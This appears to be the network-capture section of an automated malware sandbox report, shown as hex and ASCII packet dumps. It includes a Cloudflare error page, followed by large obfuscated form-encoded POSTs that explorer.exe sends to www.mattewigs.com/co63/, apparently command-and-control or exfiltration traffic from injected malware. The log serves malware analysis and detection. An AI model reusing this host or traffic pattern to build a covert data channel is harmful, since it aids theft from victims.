                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IXPYbNXv81p5ihq%2BWy6ycY5YrXUF%2F0HnJSNGzPqZiS8kyGfKKunHQwd46PNOElI6wed6WlOG2fVVxBFD5hr%2BGWUhb7B7rNu6vHtzBkBPSD9ZKvy9qYEm
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 20, 2023 11:46:59.800379038 CEST1166INData Raw: 64 57 4a 49 4f 58 57 39 4e 63 68 44 31 48 74 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e
                                                      Data Ascii: dWJIOXW9NchD1Ht"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=240.999937Server: cloudflareCF-RAY: 7e9a47ba1bea9c0c-FRAalt-svc: h3=":443";
                                                      Jul 20, 2023 11:46:59.800404072 CEST1168INData Raw: 32 62 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f
                                                      Data Ascii: 2b97<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-b
                                                      Jul 20, 2023 11:46:59.800429106 CEST1169INData Raw: 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 2e 68 65 72 6f 20 7b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 30 70 78
                                                      Data Ascii: x; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; } .content--desc-large { font
                                                      Jul 20, 2023 11:46:59.800453901 CEST1170INData Raw: 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 41 72 74 62 6f 61 72 64 47 72 6f 75 70 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 30 30 30 30 30 30 2c 20 2d 38 32 2e 30 30 30 30 30 30 29 22 3e 0a 20 20 20
                                                      Data Ascii: sketch:type="MSArtboardGroup" transform="translate(-297.000000, -82.000000)"> <g id="well-be-back" sketch:type="MSLayerGroup" transform="translate(299.000000, 84.000000)"> <path d="M209.391799,46.714415
                                                      Jul 20, 2023 11:46:59.800478935 CEST1172INData Raw: 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 37 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34 22 20 73 74 72 6f 6b 65 2d 77 69
                                                      Data Ascii: 160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M0.458340557,61.6156981 L-0.149164087,54.5929811 C-0.410879257,5
                                                      Jul 20, 2023 11:46:59.800503969 CEST1173INData Raw: 68 61 70 65 47 72 6f 75 70 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 30 35 2e 30 34 34 33 34 34 2c 34 33 2e 38 33 39 38 34 39 31 20 4c 34 2e 33 39 38 39 38 34
                                                      Data Ascii: hapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="St
                                                      Jul 20, 2023 11:46:59.800563097 CEST1174INData Raw: 38 39 2c 31 30 36 2e 30 33 39 30 31 39 20 37 32 2e 30 33 36 30 38 33 36 2c 31 30 37 2e 36 34 32 30 33 38 20 37 31 2e 36 31 35 30 33 34 31 2c 31 30 37 2e 39 35 31 30 39 34 20 43 36 39 2e 36 32 35 30 34 39 35 2c 31 31 32 2e 37 32 32 37 39 32 20 36
                                                      Data Ascii: 89,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.945962 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.442
                                                      Jul 20, 2023 11:46:59.800587893 CEST1176INData Raw: 2e 37 37 36 36 33 34 37 2c 31 30 31 2e 38 33 35 31 37 20 37 35 2e 37 35 30 32 36 39 33 2c 31 30 31 2e 36 38 32 33 34 20 37 36 2e 39 38 30 38 37 33 31 2c 31 30 31 2e 36 38 32 33 34 20 43 38 30 2e 35 35 38 30 39 39 31 2c 31 30 31 2e 36 38 32 33 34
                                                      Data Ascii: .7766347,101.83517 75.7502693,101.68234 76.9808731,101.68234 C80.5580991,101.68234 87.0867399,103.040151 90.6212508,112.136604 C94.8432724,123.002491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2
                                                      Jul 20, 2023 11:46:59.800616026 CEST1177INData Raw: 35 20 35 34 2e 33 39 38 31 30 38 34 2c 31 34 35 2e 33 32 37 39 32 35 20 43 35 35 2e 35 39 34 38 31 31 31 2c 31 34 35 2e 33 32 37 39 32 35 20 35 36 2e 39 30 35 34 32 31 31 2c 31 34 35 2e 34 30 36 37 31 37 20 35 38 2e 33 33 36 30 34 30 32 2c 31 34
                                                      Data Ascii: 5 54.3981084,145.327925 C55.5948111,145.327925 56.9054211,145.406717 58.3360402,145.577208 C59.4513808,145.70966 60.5321424,145.773509 61.5844272,145.773509 C80.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330
                                                      Jul 20, 2023 11:46:59.800653934 CEST1178INData Raw: 34 31 32 2c 31 31 35 2e 36 37 38 38 36 38 20 43 33 39 2e 32 37 30 31 35 37 39 2c 31 31 35 2e 36 37 38 38 36 38 20 34 31 2e 31 36 37 32 35 33 39 2c 31 31 35 2e 30 30 38 34 35 33 20 34 33 2e 32 30 33 33 34 33 37 2c 31 31 33 2e 36 38 35 32 38 33 20
                                                      Data Ascii: 412,115.678868 C39.2701579,115.678868 41.1672539,115.008453 43.2033437,113.685283 C43.618969,113.415623 43.8094923,112.934717 43.688805,112.460604 C43.5667616,111.981736 43.1640186,111.648226 42.6622848,111.610868 C39.8105387,111.396226 39.447


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      22192.168.2.54973323.227.38.7480C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:46:59.563703060 CEST1027OUTPOST /co63/ HTTP/1.1
                                                      Host: www.mattewigs.com
                                                      Connection: close
                                                      Content-Length: 151296
                                                      Cache-Control: no-cache
                                                      Origin: http://www.mattewigs.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.mattewigs.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 28 69 75 78 41 6d 4b 44 6f 58 48 30 4a 66 68 47 30 55 43 73 34 78 7a 6b 56 63 67 47 30 6a 45 50 57 65 67 43 31 79 61 6d 47 53 61 63 67 45 70 43 52 61 56 41 56 47 76 63 55 70 56 63 28 6b 37 6a 50 77 6c 42 28 71 7a 44 56 36 6f 75 45 6f 54 4a 7a 30 37 51 59 5f 4b 61 55 75 4d 45 72 51 35 61 4b 6d 46 71 61 4b 35 61 56 71 30 65 53 63 44 6c 71 65 70 51 6a 4a 68 63 52 73 45 37 4f 54 50 73 4c 6e 4e 39 72 38 41 64 6a 55 76 5f 62 74 36 6b 44 38 52 47 4e 65 67 79 76 45 6f 2d 4c 47 35 68 55 6f 57 37 43 4e 5a 61 68 44 6f 71 76 4c 35 50 6b 6b 6e 4e 78 59 66 34 68 4f 54 67 77 68 72 68 77 57 78 77 4f 48 59 76 71 55 56 41 74 70 62 33 6c 56 4c 73 68 39 34 77 41 48 71 65 50 53 54 59 55 72 54 50 4a 54 56 63 70 6c 76 62 6f 41 4e 47 61 48 37 4b 41 34 55 66 48 51 73 48 68 44 6d 6d 33 44 30 6e 28 39 39 55 32 72 7e 2d 4d 38 53 62 37 6f 32 46 4a 38 4b 43 45 49 7a 45 49 44 59 33 58 77 6c 4c 41 46 79 5a 4e 31 4e 45 6a 6f 4b 6a 6c 4e 6a 4f 64 33 54 32 61 79 63 77 65 6e 77 42 68 6b 58 4a 33 41 49 6f 70 5f 69 75 72 61 61 30 33 78 46 47 4d 5a 70 4d 45 53 62 68 4d 42 58 31 75 51 75 2d 70 7a 53 4f 54 6f 36 70 5a 4d 74 4c 52 4e 6d 48 51 59 53 4a 72 41 33 57 4c 32 48 35 67 75 78 58 4a 62 53 64 45 34 33 68 62 32 66 32 65 6a 45 5f 44 48 65 4e 38 30 37 49 73 4e 71 79 67 37 64 35 76 45 62 2d 52 4e 32 5f 56 63 46 59 71 47 4d 73 64 4d 77 6b 70 4d 34 6b 33 70 33 50 43 52 76 78 61 52 43 6f 6a 45 56 41 50 59 38 50 55 6b 64 6b 45 57 65 49 77 39 4e 69 72 77 35 76 32 6e 31 39 5a 42 6a 67 44 6d 6a 31 44 72 76 37 42 55 32 6b 52 74 52 34 35 51 36 5f 61 2d 55 43 36 79 54 6c 50 64 4b 51 67 34 53 69 38 35 6d 35 44 77 6a 69 57 66 62 70 4e 4c 48 67 42 30 37 30 68 4f 75 77 7a 71 62 59 57 36 51 75 6d 67 49 36 42 6a 47 45 74 64 63 72 51 57 62 2d 7a 64 28 63 37 77 53 46 30 45 64 43 4e 34 32 43 69 61 55 46 59 62 64 32 5a 74 79 61 78 62 50 47 72 32 64 6f 51 6b 79 46 36 6e 4f 38 58 34 57 53 53 44 57 67 45 79 56 31 37 4b 42 7a 41 58 57 66 4e 39 37 66 30 57 7a 63 36 64 76 6b 41 79 79 57 58 4c 61 53 67 48 5a 6b 7e 4d 43 5f 4f 65 4d 39 36 41 59 37 68 64 42 32 4f 55 74 47 78 42 62 76 6d 5f 6c 42 43 45 36 51 76 69 58 43 59 49 72 43 74 46 67 4a 62 43 67 47 34 35 78 65 73 5f 61 37 7a 47 48 39 71 55 6f 4d 6e 54 5a 32 72 66 79 33 32 32 50 30 42 67 6a 41 4e 71 4d 77 4f 69 6d 76 6d 54 76 38 61 42 38 76 54 61 52 59 6d 44 59 47 35 30 50 78 45 4f 6d 44 68 41 73 4b 4d 6f 58 78 30 65 6e 73 64 6a 46 31 46 6f 54 37 41 6b 71 4b 44 5a 33 5a 7e 68 43 4e 59 5f 62 57 64 75 38 54 38 59 77 69 62 43 4f 4f 4a 50 34 30 51 68 5a 56 4f 51 73 44 43 34 4a 4b 42 36 72 77 6a 65 4b 2d 69 47 34 46 34 31 35 74 6b 46 58 43 44 42 64 48 6f 37 73 55 77 4f 75 70 76 54 6c 52 6b 4d 55 4f 36 77 59 34 32 32 74 41 67 58 57 75 35 4a 42 67 70 5f 30 44 4a 4f 55 37 78 59 6f 57 55 31 39 4b 54 63 39 48 71 4f 63 30 30 6f 28 50 6c 77 75 68 54 55 6a 66 4e 55 79 4c 45 4c 34 67 58 4b 58 48 47 58 37 50 62 73 49 43 77 4b 31 2d 77 70 65 69 58 69 48 6e 56 77 33 37 72 6c 62 37 36 4d 6c 72 45 73 54 4f 64 6e 67 51 70 59 30 69 42 64 4d 74 77 6f 34 55 4f 6a 6f 43 5a 46 4e 2d 28 39 69 49 42 59 36 4b 4e 49 79 67 53 75 36 4b 5a 78 62 77 62 35 30 4a 44 79 67 62 30 33 48 78 5a 35 59 50 67 4c 68 5f 49 36 55 7a 7e 72 5a 63 58 35 44 79 63 6c 73 43 70 37 6d 6f 4d 41 49 79 78 6b 62 49 78 6c 77 33 6d 51 6e 69 58 4d 6c 55 61 77 31 66 6a 6c 6c 5a 70 57 33 57 69 6c 49 63 48 43 35 72 45 75 6a 75 4a 63 63 79 61 51 55 41 6c 36 4a 55 28 79 50 64 6f 6b 71 31 43 35 44 75 52 55 64 62 5a 71 56 73 50 6d 63 74 49 36 73 47 74 61 57 70 69 54 57 32 79 31 45 44 71 34 4e 57 33 67 31 5a 4d 43 58 44 66 63 64 78 6a 37 67 4b 5a 6a 44 45 4f 47 4e 49 62 32 56 73 55 63 77 30 50 4b 67 6a 42 78 39 61 58 2d 43 35 62 71 4b 53 4d 52 31 73 45 5a 47 6f 4d 42 52 4b 37 30 38 51 62 56 6b 74 44 6b 30 56 4b 68 33 69 50 56 31 6e 59 46 30 55 78 35 72 57 38 6a 62 53 69 44 65 41 59 5f 68 79 76 35 41 53 51 6d 43 35 37 4f 6a 68 65 70 69 34 4f 5f 62 4c 68 5f 36 6d 67 35 46 52 75 67 49 37 50 37 74 2d 55 55 74 2d 6a 4e 7a 4b 6e 34 5a 37 58 45 4b 48 58 55 6a 36 43 6f 69 31 70 66 54 6b 43 65 6d 4b 4c 31 68 69 4d 4f 4f 33 76 49 49 33 64 77 6a 43 56 5f 49 48 6e 6c 50 4c 78 71 6a 56
                                                      Data Ascii: aJElwV=(iuxAmKDoXH0JfhG0UCs4xzkVcgG0jEPWegC1yamGSacgEpCRaVAVGvcUpVc(k7jPwlB(qzDV6ouEoTJz07QY_KaUuMErQ5aKmFqaK5aVq0eScDlqepQjJhcRsE7OTPsLnN9r8AdjUv_bt6kD8RGNegyvEo-LG5hUoW7CNZahDoqvL5PkknNxYf4hOTgwhrhwWxwOHYvqUVAtpb3lVLsh94wAHqePSTYUrTPJTVcplvboANGaH7KA4UfHQsHhDmm3D0n(99U2r~-M8Sb7o2FJ8KCEIzEIDY3XwlLAFyZN1NEjoKjlNjOd3T2aycwenwBhkXJ3AIop_iuraa03xFGMZpMESbhMBX1uQu-pzSOTo6pZMtLRNmHQYSJrA3WL2H5guxXJbSdE43hb2f2ejE_DHeN807IsNqyg7d5vEb-RN2_VcFYqGMsdMwkpM4k3p3PCRvxaRCojEVAPY8PUkdkEWeIw9Nirw5v2n19ZBjgDmj1Drv7BU2kRtR45Q6_a-UC6yTlPdKQg4Si85m5DwjiWfbpNLHgB070hOuwzqbYW6QumgI6BjGEtdcrQWb-zd(c7wSF0EdCN42CiaUFYbd2ZtyaxbPGr2doQkyF6nO8X4WSSDWgEyV17KBzAXWfN97f0Wzc6dvkAyyWXLaSgHZk~MC_OeM96AY7hdB2OUtGxBbvm_lBCE6QviXCYIrCtFgJbCgG45xes_a7zGH9qUoMnTZ2rfy322P0BgjANqMwOimvmTv8aB8vTaRYmDYG50PxEOmDhAsKMoXx0ensdjF1FoT7AkqKDZ3Z~hCNY_bWdu8T8YwibCOOJP40QhZVOQsDC4JKB6rwjeK-iG4F415tkFXCDBdHo7sUwOupvTlRkMUO6wY422tAgXWu5JBgp_0DJOU7xYoWU19KTc9HqOc00o(PlwuhTUjfNUyLEL4gXKXHGX7PbsICwK1-wpeiXiHnVw37rlb76MlrEsTOdngQpY0iBdMtwo4UOjoCZFN-(9iIBY6KNIygSu6KZxbwb50JDygb03HxZ5YPgLh_I6Uz~rZcX5DyclsCp7moMAIyxkbIxlw3mQniXMlUaw1fjllZpW3WilIcHC5rEujuJccyaQUAl6JU(yPdokq1C5DuRUdbZqVsPmctI6sGtaWpiTW2y1EDq4NW3g1ZMCXDfcdxj7gKZjDEOGNIb2VsUcw0PKgjBx9aX-C5bqKSMR1sEZGoMBRK708QbVktDk0VKh3iPV1nYF0Ux5rW8jbSiDeAY_hyv5ASQmC57Ojhepi4O_bLh_6mg5FRugI7P7t-UUt-jNzKn4Z7XEKHXUj6Coi1pfTkCemKL1hiMOO3vII3dwjCV_IHnlPLxqjVxDkJMQw_IlVEHZYZcVOOZBE_a4LMAH2LBmfS~H1FBy9ajatKYsLs~z9rR9~kucIpkLv8Yscp(PYHNNt9FgWiKgH2x0NzVWwLobEghQ1OlJ3VnVHYIQLm~WZ0IWUzcXWHMab61X3nD66wiPPk9Qt33IvV3XE-nPffFhDYWlZsNBzkhjPD(hFtz4E2q1iif8HPaRxDn-oGfJ6antoaUMwvRDUGm-~S1RBinPEyVAYxnbWdEu5X14UtH53Fx95gCBy47IUjjvBC1Sp6owYiNDhsJDYAbA4mBWbVvpgG1GdiKteWZZVaelA8n3SOeOoWSw67H08cIykQh5rUwx4uOGXCeWufwFfckADJzYOIZUYfCRJohw6L99t9jWZiKGbrM6lYXE8wOW~HDyQCagp59c5tckvgVaCd1PpDETtp4T0wDB1CF0qH(DAj98(w6e(Cf1Z2ZEgY(-vxKEGfy4HxJnT0fa8Pr_pSaLFAx5f6r9ES(om6dzB-fDzm8V5sgAuQId(6Gd8xIV7gQea5UUypr9X5KtB1GYU0VIP8wwf81fx3to(uS2DvQ3mgzo1_(VTu66PHubDeTDk4fsANlmJimkKvtks0JbC2uqdSl-AH(xK2i5IZrCN72VXPaw7SMmaXE8D6MXgcIWBgD60V0pE0j-HXe2jAaMuH3ShyAuVAXqTOeV8w2Xv493A9lgzIJWTb7CqzgR19beFp36zf6W2C7mMozBnXDBng3yw9KHaD0EUSvHeAg_G-Rk0xS_1b9WnjMgTSfWJIf31MaMCAEEl2tNXSGBkwsHvNGRiJq5bSGu59KJq1LYz8Eafj9x3pNnvWx92DZURFl1pT2X7fw_50ffskWnzPTHsNfiOtNZGw6qKSwSGJEmywL1ITsOrYqqsdXh5o~IafZ9MnQxBzJ2cZdok-iTj_o-1daxsEa8BAzi9NuivYFHTPStNo5EajUtryrZSvgVHtvkmfy7SWcXdn2mlCx-PBcGp78BE9jxtrHRfY8SDaZrSqRQIbKij2uUMKKnmkPNpEMtxbdrKbMkjov5BI(NCtoLogPLG7zntfblGwip2BKqp4QCkLvewA9V8PJc0Rjt3Zup6ImFGUtIJLKK4RAtwd4r5Uh-QhiEt1UGI9GFhkt-iyzK6yfdtudz1PjQB8i-OooX(sF8wfSL(H0kHs6Z9Bmm5ByLtDrzh997mxvbt4wU8T8uLaQjTkCaCNfQateUwJmom7zQ48H_Z63qhsx-phVYyAiFud3357aOQrjfrAfi6QvWX3hiStBAlKogi22UbTG_dCOZ6IpJ~-tpngEBj1PLmHCcNYVNHQf8tQWxD6BXPJDMz9LndVgtqH2T4MmxJ1LJ(ljRcxkEiyS_AYLXZaoJFwF7WBKgYwACMhMvSUC2KjhfAIZQfMrBzJ9MuXU1iEVt(dl604GEFEn8RZoviOjEEKsZOZxJbbyBqfGmCVxggTSSj3lYQeMDEQQg0-eoY0QInLQ3PerDTjknNwQmpLaQ6FqdpwBiNIswguyK9itSJqZaAEs5oQ3RK4D0A9iAjtjLBHLNfYJMLDDOL7ohnmRl1u43oNwWlfO1rwKOsq8pY_6LQDov0H6rJQ2BDdBMEbjrJ-bNSobm(f1qJNrryujYpnQ9RfjEhAevicHxzSTi(qJoSBu1gQkil5MhY9XCSBH8bgdQO9oDdKiKYIwyxHHT7HQzYtDPERTP7mQJuIS_SWNjs1yR3j19UWL5R8liQwUJQXoZ4JZrKR8zqM44gMFhSCGSHFaZCqxHtBBSSFfLZ3AZKuSrwqiK3zYh6CrgVuBALIbDeah1zbwQr3SBO_617kkX8xdOToUJmkHTjjtoe4lJeHjFyt8AZvnnNNo7P9jPGLc-0rTOEBrVLP2w3n9_3GPQy7gsnKsjp3V2oRaR9kd4wjra6vkqmz4KzlZY0iLC1Ggx8LRyoKffQsKjo0V-tVgQxGiexdN7pgwZoNhHsI3VLD8_mk~8m3vW~BEdT9FDPn4is0im~I35ZIsOh3b820w8wQoSDGKeGGO9HtZqch8MVffK50g1Tk3izRfZE9pa6_2Y9XribFJ5bNdK(GB9IpBBCzawgklk1sgMkdNCQckb6D2xM6wPGARFPLk2Ps8nWTDTJ8w_f_iJ4Q9QDyJdF52mUz(EPIcLNF9-RSxYPvl80Xv4eXTuAy4h2MrfV_~0B69cR6cdVc6-n7KGWRMLB_PSi_Gjkni_SCvm68Z4alIsvU3WQTxC92daf-(c5LR62ygcnS3CSv~hCRbQg1TAfzwGw4qhVsaXbjU-gxbCTus1qFeNn86Es8Idy1oGa3ub~6azcbVnK_zgn9z7xD9YPTMcEM1oyYzGnJowUGxZNiMLe_htFyM98h1G42VgzHLEMrc-r33pt2rbeJpmPHRs0BSUjKWCYTKCCCnzmke4noCTzN9Xca0307rkGGs-Bv6uUVBnvrAM0Q5OC3m-V3ohzTYs5pB4IzH0ZhNnlCZZAq6xMUL6ndJ9mz6K7bYF9x7URwAFd9d4fMSNzRBrduMOdDmY3UKws5iQ0gGGApEEtQttJcIXx_J0JK8Nbt8uO-iCV-QjaMIHlmHcyOAkAPrl3HeEPH1AIZJYPbDcspOal-ekX9(s9uayiAFWtU7-amJk~rGORI9OpuF1sLS2V33wqzD0B7rc14g1DuQZD4Oh4FuUtzieFp50Bnx0FzYw4B7gk7lg038h7dKtYn9SkYwWHhxO37Ngi
                                                      Jul 20, 2023 11:46:59.580430984 CEST1037OUTData Raw: 6d 67 7a 67 4f 4c 6c 75 71 4b 65 6c 75 35 32 64 6d 54 50 61 65 4a 49 48 70 48 6e 68 6e 32 55 54 31 56 49 58 32 38 74 7a 39 31 66 47 76 4e 78 58 65 4f 70 58 62 4b 46 51 62 70 78 73 4f 64 6a 44 76 58 7a 78 36 53 2d 4b 4f 37 73 5a 56 28 6a 49 57 28
                                                      Data Ascii: mgzgOLluqKelu52dmTPaeJIHpHnhn2UT1VIX28tz91fGvNxXeOpXbKFQbpxsOdjDvXzx6S-KO7sZV(jIW(xGQu9sDmt4lbGP41R(QYhlYTdY3pyoBuIFsavpXZR(ngrNdd3IQ80znzGggO3wGKrryzY8ZLT2rU3hrCzwzSbIDqogCOY8HmWmEZu5DsHaorrbiF958TYtw9peD7i~iU5oH8PZOzp1pYy6HnCpuNy9qoajfjLF-jB
                                                      Jul 20, 2023 11:46:59.580509901 CEST1052OUTData Raw: 73 28 42 4f 4f 77 39 30 79 30 63 5a 49 48 30 51 48 62 50 73 49 37 4c 30 30 69 32 59 54 59 70 43 49 6e 35 50 6b 53 46 77 4f 46 50 75 54 55 6e 6c 42 47 5a 59 43 6a 34 6f 68 70 55 4b 43 7a 54 72 77 79 56 69 59 35 54 31 6f 62 48 58 6d 74 63 49 67 7a
                                                      Data Ascii: s(BOOw90y0cZIH0QHbPsI7L00i2YTYpCIn5PkSFwOFPuTUnlBGZYCj4ohpUKCzTrwyViY5T1obHXmtcIgzKvU62XSeDWqsRtMpXJ3f0gJMHzIifH-a8OhoNh08MKAY6J49n39(XUfjhU5tPOqWGiMctNNne7bt4HIdAYmBHq1HMUaKUZg6r5i~r9Rvv8VFO3Xw822~wGo5iRELogfD9j6w2bH4fDmgtdADCTi8g(3z8trN7cWRh
                                                      Jul 20, 2023 11:46:59.597090960 CEST1055OUTData Raw: 63 76 74 66 74 34 6a 68 70 35 73 42 44 58 52 37 61 53 72 47 67 4a 63 6d 76 4a 37 56 32 36 77 61 34 42 69 6c 53 46 39 77 30 7a 4e 7a 6b 7a 43 6b 55 4b 57 57 52 46 74 58 47 36 61 55 58 4d 36 6e 37 34 35 64 35 53 74 64 45 36 64 72 56 68 43 59 4f 7e
                                                      Data Ascii: cvtft4jhp5sBDXR7aSrGgJcmvJ7V26wa4BilSF9w0zNzkzCkUKWWRFtXG6aUXM6n745d5StdE6drVhCYO~EIAdpzNS1BEVjG4md32M9jXImqOMNm-ancI4JMCywOk65sqcoBgFKOw1JbX~JlLlfnhIBMabss7NsQnQwZ1Vhb_4zW30S2O7PND2sZEoZPySxM4HR2jK1HNIZMmCOIPbt6sQ45WDhbacRrgA8zD0Rhg2_mAfOke3Y
                                                      Jul 20, 2023 11:46:59.597245932 CEST1073OUTData Raw: 73 28 4a 69 71 7a 6a 61 56 73 58 49 69 77 46 53 50 59 73 41 31 75 7a 33 70 51 69 67 43 4e 35 4a 52 45 6a 71 6d 51 4d 32 5a 79 65 7e 75 54 54 50 44 57 61 44 58 36 6f 38 50 53 4e 74 72 62 46 30 4d 57 57 70 72 74 36 76 70 78 32 32 61 56 64 41 52 62
                                                      Data Ascii: s(JiqzjaVsXIiwFSPYsA1uz3pQigCN5JREjqmQM2Zye~uTTPDWaDX6o8PSNtrbF0MWWprt6vpx22aVdARbLRWM1O3O4i4Q9JC2MAchYx4ADZQRQqylTxwyQzG5e7g2p44XW1Y8C5qPJIF096brNcOmyliW8QSASnsi7DclMnkuAdoMIHRPvkP9itLrcVJtyFNtMg15EaMt0JhtTgXoGDHC-m_BAkZzPFy4Z5e6Q7QMRAnJRLo7q
                                                      Jul 20, 2023 11:46:59.597282887 CEST1078OUTData Raw: 6f 42 78 38 59 70 72 37 52 32 69 63 31 42 36 42 75 32 76 35 4f 59 72 72 59 6b 32 79 43 39 39 62 4e 45 53 36 72 63 37 63 4a 50 2d 62 48 64 54 46 42 6b 6f 33 37 76 71 72 63 69 48 42 73 73 71 6d 69 42 68 30 45 56 67 74 38 28 74 54 2d 48 4c 4c 51 28
                                                      Data Ascii: oBx8Ypr7R2ic1B6Bu2v5OYrrYk2yC99bNES6rc7cJP-bHdTFBko37vqrciHBssqmiBh0EVgt8(tT-HLLQ(YOnTd2Mf_WscnFlubeeeYNtOphxWrg0(Ife1rxaNNwaTAEY8jRLXvGnRh2qMcRk9mJP02qPBx0fVMSn3U6IQQH5VCvctf1nUJdH3eqxBRi8vI(YQJcssQTwYO~fdZzE1TVUerzCOvo_jNAu19gpDVMBSv~3eKLfmh
                                                      Jul 20, 2023 11:46:59.597589016 CEST1100OUTData Raw: 49 46 38 75 50 65 5a 62 4e 6f 6e 34 67 6d 75 64 4c 6d 6b 46 69 64 78 79 67 4d 78 6a 37 4d 2d 48 6b 4e 6e 59 4f 4a 76 39 57 46 46 4d 77 4d 70 68 50 67 43 61 42 6d 65 63 74 43 36 56 42 48 71 50 69 4a 43 7a 4e 68 37 77 32 69 77 46 37 4f 34 42 31 47
                                                      Data Ascii: IF8uPeZbNon4gmudLmkFidxygMxj7M-HkNnYOJv9WFFMwMphPgCaBmectC6VBHqPiJCzNh7w2iwF7O4B1GekQ44kkWkWuDQ1srarqLaQhc28YCzGG0bdqiB(TAFwrLTPy2MhPHEMN8n1EnHcDxEZtYdGJWmPsf2CZ58OJaU6CJO(GT4IPdgzVV7SYhp(ry7xRzHFpIIB6N_YcAwbirEfOCRnr8QRus-(krbnsXLvx3qlQy922rg
                                                      Jul 20, 2023 11:46:59.613662958 CEST1103OUTData Raw: 43 42 5a 50 55 7e 4f 38 78 6f 79 6a 71 4c 4f 70 6c 46 32 72 6b 46 6a 53 4e 64 74 64 43 31 61 37 32 6a 34 4f 4b 6b 6b 4e 64 74 76 53 4a 6c 79 53 75 6d 68 6b 65 43 5f 35 49 37 6e 6f 56 64 74 62 71 46 49 55 79 6d 5f 53 47 45 78 7a 6f 41 74 70 70 7e
                                                      Data Ascii: CBZPU~O8xoyjqLOplF2rkFjSNdtdC1a72j4OKkkNdtvSJlySumhkeC_5I7noVdtbqFIUym_SGExzoAtpp~aWS7FlCHaSRYURyHqmW7iO3S8ixshHyFuIM9CPotNr3taLtfHXa6vvq4d(TtvWKrXA1jcC3SaWHiop61NL6~olw~rpqwGlWwQMJ8bBlcu9Px2XaZ1BjwTTM~i8nOM95nzpaA7y_PzyfCsBQ~xDtcL1G00w24c~vh3
                                                      Jul 20, 2023 11:46:59.613708973 CEST1108OUTData Raw: 2d 73 32 51 62 62 68 79 78 54 53 7e 64 50 4e 67 49 65 4a 28 45 4a 39 69 51 28 4f 48 74 5a 64 71 72 57 39 57 45 54 55 6f 4b 56 58 43 41 52 4d 74 42 67 6c 56 6e 76 72 65 70 6b 4e 5a 54 6a 58 5a 43 4a 4b 66 5a 58 6a 7e 63 68 59 6b 37 49 64 32 68 39
                                                      Data Ascii: -s2QbbhyxTS~dPNgIeJ(EJ9iQ(OHtZdqrW9WETUoKVXCARMtBglVnvrepkNZTjXZCJKfZXj~chYk7Id2h9zS3DpkUewsiuPX-B55XLRTa4o2dE9A_KtCvbqSx4-9oet2SvS0Bc0xMrSUukSVqe_hrHbwk3E8aSw51BuHHSuJOtwqjpeLza7VP3avTZS5NaNV-KWntyf1STPEajXykvCMhWr4PLXySbGxDb4X8xNZGXLnkDqdd3b
                                                      Jul 20, 2023 11:46:59.613753080 CEST1116OUTData Raw: 55 69 74 34 70 6f 4c 37 43 59 76 6f 38 4f 39 48 47 7a 51 68 4e 33 35 37 57 78 77 7e 74 52 30 70 6a 76 32 31 59 4d 56 72 39 4c 69 43 48 30 45 4b 64 34 76 28 75 4b 52 42 48 6e 4e 49 49 34 75 49 59 7e 4f 6c 48 4a 71 67 50 53 6c 70 57 47 52 41 62 52
